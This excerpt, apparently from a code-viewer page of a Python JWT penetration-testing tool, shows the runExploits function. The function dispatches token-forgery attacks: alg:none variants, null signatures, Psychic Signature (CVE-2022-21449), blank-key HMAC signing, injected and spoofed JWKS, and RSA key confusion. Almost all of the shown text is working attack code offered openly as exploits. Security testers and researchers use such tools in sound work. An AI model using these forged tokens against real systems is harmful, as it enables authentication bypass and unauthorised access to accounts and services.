()
| 1738 | |
| 1739 | |
| 1740 | def runExploits(): |
| 1741 | if args.exploit: |
| 1742 | if args.exploit == "a": |
| 1743 | noneToks = checkAlgNone(headDict, paylB64) |
| 1744 | zippedToks = dict(zip(noneToks, ["\"alg\":\"none\"", "\"alg\":\"None\"", "\"alg\":\"NONE\"", "\"alg\":\"nOnE\""])) |
| 1745 | for noneTok in zippedToks: |
| 1746 | desc = "EXPLOIT: "+zippedToks[noneTok]+" - this is an exploit targeting the debug feature that allows a token to have no signature\n(This will only be valid on unpatched implementations of JWT.)" |
| 1747 | jwtOut(noneTok, "Exploit: "+zippedToks[noneTok], desc) |
| 1748 | elif args.exploit == "n": |
| 1749 | jwtNull = checkNullSig(contents) |
| 1750 | desc = "EXPLOIT: null signature\n(This will only be valid on unpatched implementations of JWT.)" |
| 1751 | jwtOut(jwtNull, "Exploit: Null signature", desc) |
| 1752 | elif args.exploit == "p": |
| 1753 | jwtPsy = checkPsySig(headDict, paylB64) |
| 1754 | desc = "EXPLOIT: Psychic Signature (CVE-2022-21449)\n(This will only be valid on unpatched implementations of JWT.)" |
| 1755 | jwtOut(jwtPsy, "Exploit: Psychic Signature (CVE-2022-21449)", desc) |
| 1756 | elif args.exploit == "b": |
| 1757 | key = "" |
| 1758 | newSig, newContents = signTokenHS(headDict, paylDict, key, 256) |
| 1759 | jwtBlankPw = newContents+"."+newSig |
| 1760 | desc = "EXPLOIT: Blank password accepted in signature\n(This will only be valid on unpatched implementations of JWT.)" |
| 1761 | jwtOut(jwtBlankPw, "Exploit: Blank password accepted in signature", desc) |
| 1762 | elif args.exploit == "i": |
| 1763 | newSig, newContents = jwksEmbed(headDict, paylDict) |
| 1764 | desc = "EXPLOIT: injected JWKS\n(This will only be valid on unpatched implementations of JWT.)" |
| 1765 | jwtOut(newContents+"."+newSig, "Injected JWKS", desc) |
| 1766 | elif args.exploit == "s": |
| 1767 | if config['services']['jwksloc']: |
| 1768 | jku = config['services']['jwksloc'] |
| 1769 | else: |
| 1770 | jku = config['services']['jwksdynamic'] |
| 1771 | newContents, newSig = exportJWKS(jku) |
| 1772 | if config['services']['jwksloc'] and config['services']['jwksloc'] == args.jwksurl: |
| 1773 | cprintc("Paste this JWKS into a file at the following location before submitting token request: "+jku+"\n(JWKS file used: "+config['crypto']['jwks']+")\n"+str(config['crypto']['jwks'])+"", "cyan") |
| 1774 | desc = "Signed with JWKS at "+jku |
| 1775 | jwtOut(newContents+"."+newSig, "Spoof JWKS", desc) |
| 1776 | elif args.exploit == "k": |
| 1777 | if config['crypto']['pubkey']: |
| 1778 | newTok, newSig = checkPubKeyExploit(headDict, paylB64, config['crypto']['pubkey']) |
| 1779 | desc = "EXPLOIT: Key-Confusion attack (signing using the Public Key as the HMAC secret)\n(This will only be valid on unpatched implementations of JWT.)" |
| 1780 | jwtOut(newTok+"."+newSig, "RSA Key Confusion Exploit", desc) |
| 1781 | else: |
| 1782 | cprintc("No Public Key provided (-pk)\n", "red") |
| 1783 | parser.print_usage() |
| 1784 | |
| 1785 | def runActions(): |
| 1786 | if args.tamper: |
no test coverage detected